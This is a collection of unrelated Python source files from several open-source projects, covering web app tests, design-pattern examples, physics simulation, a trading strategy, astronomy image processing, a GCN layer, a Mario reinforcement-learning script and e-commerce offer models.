test_client = app.test_client() socketio_test_client = socketio.test_client( app, flask_test_client=test_client ) assert socketio_test_client.is_connected() assert test_client.get(url_for('index')).status_code == 200 socketio_test_client.emit( 'save dashboard settings', { 'settings': { 'gravity_meas': 'Brix', 'gravity_offset': '', 'temp_meas': 'Fahrenheit', } } ) assert socketio_test_client.get_received() == [] def test_refresh( app, ): test_client = app.test_client() socketio_test_client = socketio.test_client( app, flask_test_client=test_client ) assert socketio_test_client.is_connected() assert test_client.get(url_for('index')).status_code == 200 socketio_test_client.emit('refresh') assert socketio_test_client.get_received() == [ { 'name': 'refresh', 'args': [{ 'data': [], }], 'namespace': '/' } ] def test_logs( app, ): test_client = app.test_client() socketio_test_client = socketio.test_client( app, flask_test_client=test_client ) with mock.patch("builtins.open", mock.mock_open(read_data=b"data")) as mock_file: assert socketio_test_client.is_connected() assert test_client.get(url_for('logs')).status_code == 200 socketio_test_client.emit('logs') assert socketio_test_client.get_received() == [ { 'name': 'logs', 'args': [{'data': b'data'}], 'namespace': '/' } ] gama79530/DesignPattern """ # All classes should extend PizzaStore and override the following methods def createPizza(self) : """ import PizzaIngredientsFactory import Pizza class PizzaStore : def createPizza(self, pizza_type) : assert False, 'This method should be overrided.' 
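    # Factory Method: the concrete stores below (ChicagoPizzaStore,
    # NYPizzaStore) override createPizza with their own ingredient factory,
    # while orderPizza is the shared ordering template that calls it.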
def orderPizza(self, pizza_type) : pizza = self.createPizza(pizza_type) pizza.prepare() pizza.bake() pizza.cut() pizza.box() return pizza class ChicagoPizzaStore(PizzaStore) : def createPizza(self, pizza_type) : pizza = None ingredientFactory = PizzaIngredientsFactory.ChicagoPizzaIngredientFactory() if pizza_type == 'cheese' : pizza = Pizza.CheesePizza(ingredientFactory) pizza.name = 'Chicago Style Cheese Pizza' elif pizza_type == 'veggie' : pizza = Pizza.VeggiePizza(ingredientFactory) pizza.name = 'Chicago Style Veggie Pizza' elif pizza_type == 'clam' : pizza = Pizza.ClamPizza(ingredientFactory) pizza.name = 'Chicago Style Clam Pizza' elif pizza_type == 'pepperoni' : pizza = Pizza.PepperoniPizza(ingredientFactory) pizza.name = 'Chicago Style Pepperoni Pizza' return pizza class NYPizzaStore(PizzaStore) : def createPizza(self, pizza_type) : pizza = None ingredientFactory = PizzaIngredientsFactory.NYPizzaIngredientFactory() if pizza_type == 'cheese' : pizza = Pizza.CheesePizza(ingredientFactory) pizza.name = 'New York Style Cheese Pizza' elif pizza_type == 'veggie' : pizza = Pizza.VeggiePizza(ingredientFactory) pizza.name = 'New York Style Veggie Pizza' elif pizza_type == 'clam' : pizza = Pizza.ClamPizza(ingredientFactory) pizza.name = 'New York Style Clam Pizza' elif pizza_type == 'pepperoni' : pizza = Pizza.PepperoniPizza(ingredientFactory) pizza.name = 'New York Style Pepperoni Pizza' return pizzastolk/bullet31-10 import pybullet as p from time import sleep physicsClient = p.connect(p.GUI) useDeformable = True if useDeformable: p.resetSimulation(p.RESET_USE_DEFORMABLE_WORLD) gravZ=-10 p.setGravity(0, 0, gravZ) planeOrn = [0,0,0,1]#p.getQuaternionFromEuler([0.3,0,0]) planeId = p.loadURDF("plane.urdf", [0,0,-2],planeOrn) boxId = p.loadURDF("cube.urdf", [0,1,2],useMaximalCoordinates = True) clothId = p.loadSoftBody("bunny.obj", basePosition = [0,0,2], scale = 0.5, mass = 1., useNeoHookean = 0, useBendingSprings=1, useMassSpring=1, springElasticStiffness=100, springDampingStiffness=.001, useSelfCollision = 0, frictionCoeff = .5, useFaceContact=1) p.setTimeStep(0.0005) p.setRealTimeSimulation(1) while p.isConnected(): p.setGravity(0,0,gravZ) sleep(1./240.) crunchex/py-spin100-1000 #!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import absolute_import, print_function import sys import time from functools import wraps from concurrent.futures import ThreadPoolExecutor # For python 2/3 compatible. 
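# (text_type is applied to the spinner frames and the printed format string
# below so the animated output stays unicode on both interpreter versions.)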
if sys.version_info.major == 2: text_type = unicode else: text_type = str Box1 = u'⠋⠙⠹⠸⠼⠴⠦⠧⠇⠏' Box2 = u'⠋⠙⠚⠞⠖⠦⠴⠲⠳⠓' Box3 = u'⠄⠆⠇⠋⠙⠸⠰⠠⠰⠸⠙⠋⠇⠆' Box4 = u'⠋⠙⠚⠒⠂⠂⠒⠲⠴⠦⠖⠒⠐⠐⠒⠓⠋' Box5 = u'⠁⠉⠙⠚⠒⠂⠂⠒⠲⠴⠤⠄⠄⠤⠴⠲⠒⠂⠂⠒⠚⠙⠉⠁' Box6 = u'⠈⠉⠋⠓⠒⠐⠐⠒⠖⠦⠤⠠⠠⠤⠦⠖⠒⠐⠐⠒⠓⠋⠉⠈' Box7 = u'⠁⠁⠉⠙⠚⠒⠂⠂⠒⠲⠴⠤⠄⠄⠤⠠⠠⠤⠦⠖⠒⠐⠐⠒⠓⠋⠉⠈⠈' Spin1 = u'|/-\\' Spin2 = u'◴◷◶◵' Spin3 = u'◰◳◲◱' Spin4 = u'◐◓◑◒' Spin5 = u'▉▊▋▌▍▎▏▎▍▌▋▊▉' Spin6 = u'▌▄▐▀' Spin7 = u'╫╪' Spin8 = u'■□▪▫' Spin9 = u'←↑→↓' Default = Box1 class Spinner(object): def __init__(self, frames): self.frames = frames self.length = len(frames) self.position = 0 def current(self): return self.frames[self.position] def next(self): current_frame = self.current() self.position = (self.position + 1) % self.length return text_type(current_frame) def reset(self): self.position = 0 def make_spin(spin_style=Default, words="", ending="\n"): spinner = Spinner(spin_style) def decorator(func): @wraps(func) def wrapper(*args, **kwargs): with ThreadPoolExecutor(max_workers=1) as executor: future = executor.submit(func, *args, **kwargs) while future.running(): print(text_type("\r{0} {1}").format(spinner.next(), words), end="") sys.stdout.flush() time.sleep(0.1) print(ending, end="") return future.result() return wrapper return decorator 1-10 import logging from ..lib import FileSystem, CryptoServices from ..common import Object from .base_command import BaseCommand class SSH(BaseCommand): """ Edge Filer SSH daemon APIs """ def enable(self, public_key=None, public_key_file=None, exponent=65537, key_size=2048): """ Enable the Edge Filer's SSH daemon :param str,optional public_key: A PEM-encoded public key in OpenSSH format. If neither a public key nor public key file were specified, an RSA key pair will be generated automatically. The PEM-encoded private key will be saved to the default Downloads directory :param str,optional public_key_file: A path to the public key file :param int,optional exponent: The public exponent of the new key, defaults to `65537` :param int,optional key_size: The length of the modulus in bits, defaults to `2048` """ param = Object() if public_key is None: if public_key_file is not None: FileSystem.instance().get_local_file_info(public_key_file) with open(public_key_file, 'r', encoding='utf-8') as f: public_key = f.read() else: public_key = CryptoServices.generate_and_save_key_pair(self._gateway.host(), exponent=exponent, key_size=key_size) param.publicKey = public_key logging.getLogger().info("Enabling SSH daemon.") self._gateway.execute('/config/device', 'startSSHD', param) logging.getLogger().info("SSH daemon enabled.") def disable(self): logging.getLogger().info("Disabling SSH daemon.") self._gateway.execute('/config/device', 'stopSSHD') logging.getLogger().info("SSH daemon disabled.") examples/backtesting/strategies/as_strategy.py from vnpy.app.cta_strategy import ( CtaTemplate, StopOrder, TickData, BarData, TradeData, OrderData, BarGenerator, ArrayManager, ) import time, datetime import math class AsStrategy(CtaTemplate): k = 0.1 sigma = 1 gamma = 0.5 fixed_size = 1000 delta_t = 0 r = 0 spread = 0 bid_price = 0 ask_price = 0 last_bid_price = 0 last_ask_price = 0 milli_second_per_day = 86400000 cover_only_milli = 1000 * 60 * 15 cover_only_request = 400 vt_orderids = [] last_tick = None parameters = [ "k", "sigma", "gamma", "fixed_size", "cover_only_milli", "cover_only_request", ] variables = [ "delta_t", "r", "spread", "bid_price", "ask_price" ] def __init__(self, cta_engine, strategy_name, vt_symbol, setting): """""" super().__init__(cta_engine, strategy_name, vt_symbol, setting) 
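        # Per-minute request throttle: on_tick resets this counter at the
        # start of each new minute and switches to cover-only quoting once it
        # exceeds cover_only_request (see out_of_request_limit).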
self.request_counter = 0 self.last_now = datetime.datetime.now() def on_init(self): """ Callback when strategy is inited. """ self.write_log("策略初始化") self.load_tick(0) print("k: "+str(self.k)) print("gamma: "+ str(self.gamma)) print("sigma: "+ str(self.sigma)) print("request limit: "+ str(self.cover_only_request)) def on_start(self): """ Callback when strategy is started. """ self.write_log("策略start") def on_stop(self): """ Callback when strategy is stopped. """ self.write_log("策略停止") @classmethod def remain_milli_today(cls, now): milli_sec_now = int(round(now.timestamp() * 1000)) zeroToday = now - datetime.timedelta(hours=now.hour, minutes=now.minute, seconds=now.second, microseconds=now.microsecond) milli_sec_endtime = int(round(zeroToday.timestamp()*1000)) + cls.milli_second_per_day remain_time = milli_sec_endtime - milli_sec_now return remain_time def new_minute(self, now): if now.minute != self.last_now.minute: return True return False def force_cover(self): pass def out_of_request_limit(self): if self.request_counter > self.cover_only_request: # print("out of request!! called: {}, limit: {}".format(self.request_counter, self.cover_only_request)) return True return False def end_of_day(self, remain_time): if remain_time < self.cover_only_milli: return True return False def on_tick(self,tick: TickData): """ Callback of new tick data update. """ #get position: self.pos #calculate time left (T-t) delta_t now = tick.datetime if self.new_minute(now): self.request_counter = 0 self.last_now = now remain_time = self.remain_milli_today(now) if self.end_of_day(remain_time) or self.out_of_request_limit(): cover_only = True else: cover_only = False self.delta_t = remain_time / self.milli_second_per_day #calculate indifferent price r(s,t) = s - q * gamma * sigma^2 * delta_t self.r = (tick.ask_price_1 + tick.bid_price_1)/2 - self.pos * self.gamma * self.sigma**2 * self.delta_t #calculate spread, spread = 2 / gamma * ln(1 + gamma/k) self.spread = self.gamma * self.sigma**2 * self.delta_t + 2 / self.gamma * math.log(1 + self.gamma / self.k) #calculate ask, ask_price = r + spread/2 #calculate bid, bid_price = r - spread/2 self.ask_price = self.round_up(self.r + self.spread/2, self.get_pricetick) self.bid_price = self.round_down(self.r - self.spread/2, self.get_pricetick) #如果上个tick提交的委托没成交 if self.vt_orderids: #新tick的bid ask和上个tick不变,返回 if(self.bid_price == self.last_bid_price and self.ask_price == self.last_ask_price): return #新tick的bid ask发生变化,撤旧单,发新单 else: for orderid in self.vt_orderids: self.cancel_remove_order(orderid) self.send_new_order(cover_only=cover_only) else: self.send_new_order(cover_only=cover_only) self.last_ask_price = self.ask_price self.last_bid_price = self.bid_price self.write_log("{}\n delta_t: {}, spread: {}, r: {}, request counter: {}".format(tick, self.delta_t, self.spread, self.r, self.request_counter)) # self.last_tick = tick @staticmethod def round_up(price, price_tick): reminder = price % price_tick rounded = x + price_tick - reminder return rounded @staticmethod def round_down(price, price_tick): rounded = price // price_tick * price_tick return rounded def on_order(self, order: OrderData): """ Callback of new order data update. """ pass def on_trade(self, trade: TradeData): """ Callback of new trade data update. 
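        Removes the filled order id from the tracked open-quote list so the
        strategy can submit a fresh pair of quotes on a later tick.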
""" if trade.vt_orderid in self.vt_orderids: self.vt_orderids.remove(trade.vt_orderid) self.write_log(" order filled {}".format(trade)) def cancel_remove_order(self, orderid): self.cancel_order(orderid) self.vt_orderids.remove(orderid) self.request_counter += 1 # def force_cover(self): # if self.pos = 0: # return # elif self.pos > 0: # self.sell(self.pos) def send_new_order(self, cover_only=False): if self.pos == 0 and not cover_only: vt_orderids = self.buy(self.bid_price, self.fixed_size) self.vt_orderids.extend(vt_orderids) vt_orderids = self.short(self.ask_price, self.fixed_size) self.vt_orderids.extend(vt_orderids) self.request_counter += 2 elif self.pos > 0: if not cover_only: vt_orderids = self.buy(self.bid_price, self.fixed_size) self.vt_orderids.extend(vt_orderids) self.request_counter += 1 vt_orderids = self.sell(self.ask_price, self.fixed_size) self.vt_orderids.extend(vt_orderids) self.request_counter += 1 elif self.pos < 0: if not cover_only: vt_orderids =self.short(self.ask_price, self.fixed_size) self.vt_orderids.extend(vt_orderids) self.request_counter += 1 vt_orderids = self.cover(self.bid_price, self.fixed_size) self.vt_orderids.extend(vt_orderids) self.request_counter += 1 chen2qu/USD #!/pxrpythonsubst # # Copyright 2018 Pixar # # Licensed under the Apache License, Version 2.0 (the "Apache License") # with the following modification; you may not use this file except in # compliance with the Apache License and the following modification to it: # Section 6. Trademarks. is deleted and replaced with: # # 6. Trademarks. This License does not grant permission to use the trade # names, trademarks, service marks, or product names of the Licensor # and its affiliates, except as required to comply with Section 4(c) of # the License and to reproduce the content of the NOTICE file. # # You may obtain a copy of the Apache License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the Apache License with the above modification is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the Apache License for the specific # language governing permissions and limitations under the Apache License. from pxr import Tf, Usd, UsdMtlx import unittest def _EmptyLayer(): stage = Usd.Stage.CreateInMemory() return stage.GetRootLayer().ExportToString() class TestFileFormat(unittest.TestCase): def test_EmptyFile(self): """ Verify that an empty MaterialX document fails. """ with self.assertRaises(Tf.ErrorException) as e: UsdMtlx._TestString('') def test_MissingFile(self): """ Verify that a missing MaterialX file fails. """ with self.assertRaises(Tf.ErrorException) as e: UsdMtlx._TestFile('non-existent-file.xml') def test_BadMagic(self): """ Verify that a MaterialX file with a bad XML header fails. """ with self.assertRaises(Tf.ErrorException) as e: UsdMtlx._TestString('''''') def test_EmptyXMLDocument(self): """ Verify that a MaterialX file with only an XML header fails. """ with self.assertRaises(Tf.ErrorException) as e: UsdMtlx._TestString('''''') def test_MissingMaterialXDocument(self): """ Verify that a MaterialX file without a materialx element is okay. """ stage = UsdMtlx._TestString( ''' ''') self.assertEqual(stage.GetRootLayer().ExportToString(), _EmptyLayer()) def test_EmptyMaterialXDocument(self): """ Verify that a file with an empty a materialx element is okay. 
""" stage = UsdMtlx._TestString( ''' ''') self.assertEqual(stage.GetRootLayer().ExportToString(), _EmptyLayer()) def test_DuplicateName(self): """ Verify that a MaterialX file with duplicate element names fails. """ with self.assertRaises(Tf.ErrorException) as e: UsdMtlx._TestString( ''' ''') def test_Cycle(self): """ Verify that a MaterialX file with an inherits cycle fails. """ with self.assertRaises(Tf.ErrorException) as e: UsdMtlx._TestString( ''' ''') def test_NodeGraphs(self): """ Test general MaterialX node graph conversions. """ stage = UsdMtlx._TestFile('NodeGraphs.mtlx', nodeGraphs=True) with open('NodeGraphs.usda', 'w') as f: print >>f, stage.GetRootLayer().ExportToString() def test_Looks(self): """ Test general MaterialX look conversions. """ stage = UsdMtlx._TestFile('Looks.mtlx') with open('Looks.usda', 'w') as f: print >>f, stage.GetRootLayer().ExportToString() if __name__ == '__main__': unittest.main() # Copyright 2021 DAI Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at: http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from marshmallow import Schema, fields class PayloadTransactionSchema(Schema): """ POST Payload Transaction Metadata Schema. """ chain_id = fields.String(required=True) tx_hash = fields.String(required=True) block_number = fields.Integer(required=True) sender = fields.String(required=True) receiver = fields.String(required=False) timestamp = fields.Integer(required=True) gas_price = fields.Integer(required=True) transaction_index = fields.Integer(required=True) value = fields.Integer(required=True) gas_used = fields.Integer(required=False) status = fields.Boolean(required=True) pypeit/images/buildimage.py """ Uber object for calibration images, e.g. arc, flat .. include common links, assuming primary doc root is up one directory .. 
include:: ../links.rst """ import os import numpy as np from pypeit import msgs from pypeit.par import pypeitpar from pypeit.images import combineimage from pypeit.images import pypeitimage from pypeit.core import procimg from IPython import embed class ArcImage(pypeitimage.PypeItImage): """ Simple DataContainer for the Arc Image """ # Peg the version of this class to that of PypeItImage version = pypeitimage.PypeItImage.version # I/O output_to_disk = ('ARC_IMAGE', 'ARC_FULLMASK', 'ARC_DETECTOR') hdu_prefix = 'ARC_' # Master fun master_type = 'Arc' master_file_format = 'fits' class AlignImage(pypeitimage.PypeItImage): """ Simple DataContainer for the Arc Image """ # Peg the version of this class to that of PypeItImage version = pypeitimage.PypeItImage.version # I/O output_to_disk = ('ALIGN_IMAGE', 'ALIGN_FULLMASK', 'ALIGN_DETECTOR') hdu_prefix = 'ALIGN_' # Master fun master_type = 'Align' master_file_format = 'fits' class BiasImage(pypeitimage.PypeItImage): """ Simple DataContainer for the Tilt Image """ # Set the version of this class version = pypeitimage.PypeItImage.version # Output to disk output_to_disk = ('BIAS_IMAGE', 'BIAS_DETECTOR') hdu_prefix = 'BIAS_' master_type = 'Bias' master_file_format = 'fits' class DarkImage(pypeitimage.PypeItImage): """ Simple DataContainer for the Dark Image """ # Set the version of this class version = pypeitimage.PypeItImage.version # Output to disk output_to_disk = ('DARK_IMAGE', 'DARK_DETECTOR') hdu_prefix = 'DARK_' master_type = 'Dark' master_file_format = 'fits' class TiltImage(pypeitimage.PypeItImage): """ Simple DataContainer for the Tilt Image """ # Peg the version of this class to that of PypeItImage version = pypeitimage.PypeItImage.version # I/O output_to_disk = ('TILT_IMAGE', 'TILT_FULLMASK', 'TILT_DETECTOR') hdu_prefix = 'TILT_' # Master fun master_type = 'Tiltimg' master_file_format = 'fits' class TraceImage(pypeitimage.PypeItImage): """ Simple DataContainer for the Trace Image """ # Peg the version of this class to that of PypeItImage version = pypeitimage.PypeItImage.version # I/O output_to_disk = ('TRACE_IMAGE', 'TRACE_FULLMASK', 'TRACE_DETECTOR') hdu_prefix = 'TRACE_' class SkyRegions(pypeitimage.PypeItImage): """ Simple DataContainer for the SkyRegions Image """ # Peg the version of this class to that of PypeItImage version = pypeitimage.PypeItImage.version # I/O output_to_disk = ('SKYREG_IMAGE') hdu_prefix = 'SKYREG_' # Master fun master_type = 'SkyRegions' master_file_format = 'fits.gz' def buildimage_fromlist(spectrograph, det, frame_par, file_list, bias=None, bpm=None, dark=None, flatimages=None, sigma_clip=False, sigrej=None, maxiters=5, ignore_saturation=True, slits=None): """ Build a PypeItImage from a list of files (and instructions) Args: spectrograph (:class:`pypeit.spectrographs.spectrograph.Spectrograph`): Spectrograph used to take the data. det (:obj:`int`): The 1-indexed detector number to process. frame_par (:class:`pypeit.par.pypeitpar.FramePar`): Parameters that dictate the processing of the images. See :class:`pypeit.par.pypeitpar.ProcessImagesPar` for the defaults. file_list (list): List of files bpm (np.ndarray, optional): Bad pixel mask. Held in ImageMask bias (np.ndarray, optional): Bias image flatimages (:class:`pypeit.flatfield.FlatImages`, optional): For flat fielding sigrej (int or float, optional): Rejection threshold for sigma clipping. Code defaults to determining this automatically based on the numberr of images provided. 
maxiters (int, optional): ignore_saturation (bool, optional): Should be True for calibrations and False otherwise Returns: :class:`pypeit.images.pypeitimage.PypeItImage`: Or one of its children """ # Check if not isinstance(frame_par, pypeitpar.FrameGroupPar): msgs.error('Provided ParSet for must be type FrameGroupPar.') #process_steps = procimg.set_process_steps(bias, frame_par) # combineImage = combineimage.CombineImage(spectrograph, det, frame_par['process'], file_list) pypeitImage = combineImage.run(bias=bias, bpm=bpm, dark=dark, flatimages=flatimages, sigma_clip=sigma_clip, sigrej=sigrej, maxiters=maxiters, ignore_saturation=ignore_saturation, slits=slits, combine_method=frame_par['process']['combine']) # # Decorate according to the type of calibration # Primarily for handling MasterFrames # WARNING, any internals in pypeitImage are lost here if frame_par['frametype'] == 'bias': finalImage = BiasImage.from_pypeitimage(pypeitImage) elif frame_par['frametype'] == 'dark': finalImage = DarkImage.from_pypeitimage(pypeitImage) elif frame_par['frametype'] == 'arc': finalImage = ArcImage.from_pypeitimage(pypeitImage) elif frame_par['frametype'] == 'tilt': finalImage = TiltImage.from_pypeitimage(pypeitImage) elif frame_par['frametype'] == 'trace': finalImage = TraceImage.from_pypeitimage(pypeitImage) elif frame_par['frametype'] == 'align': finalImage = AlignImage.from_pypeitimage(pypeitImage) elif frame_par['frametype'] in ['pixelflat', 'science', 'standard', 'illumflat']: finalImage = pypeitImage else: finalImage = None embed(header='193 of buildimage') # Internals finalImage.process_steps = pypeitImage.process_steps finalImage.files = file_list finalImage.rawheadlist = pypeitImage.rawheadlist finalImage.head0 = pypeitImage.head0 # Return return finalImage 0 # -*- coding: utf-8 -*- from plone.testing import z2 from plone.testing import Layer class DRILayer(Layer): defaultBases = (z2.STARTUP,) def setUp(self): with z2.zopeApp() as app: z2.installProduct(app, 'Products.DateRecurringIndex') def tearDown(self): with z2.zopeApp() as app: z2.uninstallProduct(app, 'Products.DateRecurringIndex') DRI_FIXTURE = DRILayer() derekbt96/interop from auvsi_suas.views.login import Login from auvsi_suas.views.index import Index from auvsi_suas.views.missions import Evaluate from auvsi_suas.views.missions import ExportKml from auvsi_suas.views.missions import LiveKml from auvsi_suas.views.missions import LiveKmlUpdate from auvsi_suas.views.missions import Missions from auvsi_suas.views.missions import MissionsId from auvsi_suas.views.obstacles import Obstacles from auvsi_suas.views.odlcs import Odlcs from auvsi_suas.views.odlcs import OdlcsAdminReview from auvsi_suas.views.odlcs import OdlcsId from auvsi_suas.views.odlcs import OdlcsIdImage from auvsi_suas.views.teams import Teams from auvsi_suas.views.teams import TeamsId from auvsi_suas.views.telemetry import Telemetry from django.conf.urls import url from django.conf import settings from django.conf.urls.static import static app_name = 'auvsi_suas' # yapf: disable urlpatterns = [ url(r'^$', Index.as_view(), name='index'), url(r'^api/login$', Login.as_view(), name='login'), url(r'^api/missions$', Missions.as_view(), name='missions'), url(r'^api/missions/(?P\d+)$', MissionsId.as_view(), name='missions_id'), url(r'^api/missions/export\.kml$', ExportKml.as_view(), name='export_kml'), url(r'^api/missions/live\.kml$', LiveKml.as_view(), name='live_kml'), url(r'^api/missions/update\.kml$', LiveKmlUpdate.as_view(), name='update_kml'), 
url(r'^api/missions/evaluate\.zip$', Evaluate.as_view(), name='evaluate'), url(r'^api/obstacles$', Obstacles.as_view(), name='obstacles'), url(r'^api/odlcs$', Odlcs.as_view(), name='odlcs'), url(r'^api/odlcs/(?P\d+)$', OdlcsId.as_view(), name='odlcs_id'), url(r'^api/odlcs/(?P\d+)/image$', OdlcsIdImage.as_view(), name='odlcs_id_image'), url(r'^api/odlcs/review$', OdlcsAdminReview.as_view(), name='odlcs_review'), url(r'^api/odlcs/review/(?P\d+)$', OdlcsAdminReview.as_view(), name='odlcs_review_id'), url(r'^api/teams$', Teams.as_view(), name='teams'), url(r'^api/teams/(?P\d+)$', TeamsId.as_view(), name='teams_id'), url(r'^api/telemetry$', Telemetry.as_view(), name='telemetry'), ] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) # yapf: enable # modified from https://github.com/tkipf/pygcn/blob/master/pygcn/layers.py import math import torch import torch.nn as nn from torch.nn.parameter import Parameter class GraphConvolution(nn.Module): """ Simple GCN layer, similar to https://arxiv.org/abs/1609.02907 """ def __init__(self, in_features, out_features, bias=True): super(GraphConvolution, self).__init__() self.in_features = in_features self.out_features = out_features self.weight = Parameter(torch.FloatTensor(in_features, out_features)) if bias: self.bias = Parameter(torch.FloatTensor(out_features)) else: self.register_parameter('bias', None) self.reset_parameters() self.bn = nn.BatchNorm1d(out_features) def reset_parameters(self): stdv = 1. / math.sqrt(self.weight.size(1)) self.weight.data.uniform_(-stdv, stdv) if self.bias is not None: self.bias.data.uniform_(-stdv, stdv) def forward(self, x, adj): support = torch.bmm(adj, x) result = torch.mm(support.view(-1, self.in_features), self.weight) output = result.view(-1, adj.data.shape[1], self.out_features) if self.bias is not None: output = output + self.bias output = output.transpose(1, 2).contiguous() output = self.bn(output) output = output.transpose(1, 2) return output def __repr__(self): return self.__class__.__name__ + ' (' \ + str(self.in_features) + ' -> ' \ + str(self.out_features) + ')' 1-10 import gym import numpy as np import collections from agent_dqn import Agent from nes_py.wrappers import JoypadSpace import gym_super_mario_bros from gym_super_mario_bros.actions import SIMPLE_MOVEMENT def rgb_to_gry(obs, dsr): x = np.asarray(np.around(obs[..., :3] @ [0.299, 0.587, 0.114] ), dtype=np.int8) return x[::dsr, ::dsr] env = gym_super_mario_bros.make('SuperMarioBros-1-1-v0') env = JoypadSpace(env, SIMPLE_MOVEMENT) frame_stack_len = 4 downsampling_ratio = 2 obs_dims = tuple([int(x/downsampling_ratio) for x in list(env.observation_space.shape[:2])]) gamma = 0.99 agent = Agent(gamma=gamma, eps=0.05, lr=0.0003, tau=0.0001, batch_size=64, max_mem=150*1000, obs_dim=obs_dims, frame_stack=frame_stack_len, n_actions=env.action_space.n) frame_stack = collections.deque(maxlen=frame_stack_len) x_stack = collections.deque(maxlen=90) save_freq = 100 step_size = 6 exp_id = 0 training_steps = 0 while training_steps<=5e5: ep_rew = 0 obs = env.reset() obs[0, 0, :], obs[2, 0, :] = 0, 0 [frame_stack.append(rgb_to_gry(obs, downsampling_ratio)) for ii in range(frame_stack_len)] [x_stack.append(np.random.randint(60, 80)) for ii in range(len(x_stack))] stacked_obs = np.asarray(frame_stack, dtype=np.uint8) done = False last_action, max_x = 0, 40 while not done: training_steps += 1 all_frame_rew = 0 for step in range(step_size): frame_rew = 0 action, action_val = 
agent.choose_action(stacked_obs, True) for f in range(frame_stack_len): if done: pass else: env.render() obs, reward, done, info = env.step(action) # Jump Including Action obs[0, 0, :] = float((last_action == 2) or (last_action == 5) or (last_action == 4)) # Right Including Action obs[2, 0, :] = float((last_action >=1) and (last_action <= 4)) reward += float(reward < 0) * 2 * reward frame_rew += reward / 2 frame_stack.append(rgb_to_gry(obs, downsampling_ratio)) if info['flag_get'] == True: frame_rew += 600 if info['x_pos'] > max_x: max_x = info['x_pos'] last_action = action x_stack.append(max_x) ep_rew += frame_rew all_frame_rew += frame_rew * (gamma ** (step_size - step - 1)) next_stacked_obs = np.asarray(frame_stack, dtype=np.uint8) agent.memory.store_transition(stacked_obs, action, all_frame_rew, next_stacked_obs, done, float(info['x_pos'])) if done: agent.memory.store_transition(stacked_obs, action, all_frame_rew, next_stacked_obs, done, float(info['x_pos'])) agent.update() stacked_obs = next_stacked_obs if len(set(x_stack)) == 1: done = True if training_steps % save_freq == 0: agent.save_agent(training_steps, exp_id) print(f"AGENT SAVED @{training_steps}") 0 ''' Title : Python: Division Subdomain : Introduction Domain : Python Author : Created : 28 September 2016 ''' from __future__ import division a = int(input()) b = int(input()) print (a // b) print (a / b)from decimal import Decimal import datetime from django.contrib.auth.models import User from django.db import models from django.utils.translation import ugettext as _ from django.core.exceptions import ValidationError from oscar.apps.offer.managers import ActiveOfferManager SITE, VOUCHER, USER, SESSION = ("Site", "Voucher", "User", "Session") class AbstractConditionalOffer(models.Model): u""" A conditional offer (eg buy 1, get 10% off) """ name = models.CharField(max_length=128) description = models.TextField(blank=True, null=True) # Offers come in a few different types: # (a) Offers that are available to all customers on the site. Eg a # 3-for-2 offer. # (b) Offers that are linked to a voucher, and only become available once # that voucher has been applied to the basket # (c) Offers that are linked to a user. Eg, all students get 10% off. The code # to apply this offer needs to be coded # (d) Session offers - these are temporarily available to a user after some trigger # event. Eg, users coming from some affiliate site get 10% off. TYPE_CHOICES = ( (SITE, "Site offer - available to all users"), (VOUCHER, "Voucher offer - only available after entering the appropriate voucher code"), (USER, "User offer - available to certain types of user"), (SESSION, "Session offer - temporary offer, available for a user for the duration of their session"), ) offer_type = models.CharField(_("Type"), choices=TYPE_CHOICES, default=SITE, max_length=128) condition = models.ForeignKey('offer.Condition') benefit = models.ForeignKey('offer.Benefit') # Range of availability. Note that if this is a voucher offer, then these # dates are ignored and only the dates from the voucher are used to determine # availability. start_date = models.DateField(blank=True, null=True) end_date = models.DateField(blank=True, null=True) # Some complicated situations require offers to be applied in a set order. 
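# Note: offers with a larger `priority` value are applied first; Meta.ordering below is
# ['-priority'], so querysets already come back highest-priority first.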
priority = models.IntegerField(default=0, help_text="The highest priority offers are applied first") # We track some information on usage total_discount = models.DecimalField(decimal_places=2, max_digits=12, default=Decimal('0.00')) date_created = models.DateTimeField(auto_now_add=True) objects = models.Manager() active = ActiveOfferManager() # We need to track the voucher that this offer came from (if it is a voucher offer) _voucher = None class Meta: ordering = ['-priority'] abstract = True def __unicode__(self): return self.name def is_active(self, test_date=None): if not test_date: test_date = datetime.date.today() return self.start_date <= test_date and test_date < self.end_date def is_condition_satisfied(self, basket): return self._proxy_condition().is_satisfied(basket) def apply_benefit(self, basket): u""" Applies the benefit to the given basket and returns the discount. """ if not self.is_condition_satisfied(basket): return Decimal('0.00') return self._proxy_benefit().apply(basket, self._proxy_condition()) def set_voucher(self, voucher): self._voucher = voucher def get_voucher(self): return self._voucher def _proxy_condition(self): u""" Returns the appropriate proxy model for the condition """ return self.condition def _proxy_benefit(self): u""" Returns the appropriate proxy model for the benefit """ return self.benefit class AbstractCondition(models.Model): COUNT, VALUE, COVERAGE = ("Count", "Value", "Coverage") TYPE_CHOICES = ( (COUNT, _("Depends on number of items in basket that are in condition range")), (VALUE, _("Depends on value of items in basket that are in condition range")), (COVERAGE, _("Needs to contain a set number of DISTINCT items from the condition range")) ) range = models.ForeignKey('offer.Range') type = models.CharField(max_length=128, choices=TYPE_CHOICES) value = models.DecimalField(decimal_places=2, max_digits=12) class Meta: abstract = True def __unicode__(self): if self.type == self.COUNT: return u"Basket includes %d item(s) from %s" % (self.value, str(self.range).lower()) elif self.type == self.COVERAGE: return u"Basket includes %d distinct products from %s" % (self.value, str(self.range).lower()) return u"Basket includes %.2f value from %s" % (self.value, str(self.range).lower()) def consume_items(self, basket): pass def is_satisfied(self, basket): """ Determines whether a given basket meets this condition. This is stubbed in this top-class object. The subclassing proxies are responsible for implementing it correctly. """ return False class AbstractBenefit(models.Model): PERCENTAGE, FIXED, MULTIBUY, FIXED_PRICE = ("Percentage", "Absolute", "Multibuy", "Fixed price") TYPE_CHOICES = ( (PERCENTAGE, _("Discount is a % of the product's value")), (FIXED, _("Discount is a fixed amount off the product's value")), (MULTIBUY, _("Discount is to give the cheapest product for free")), 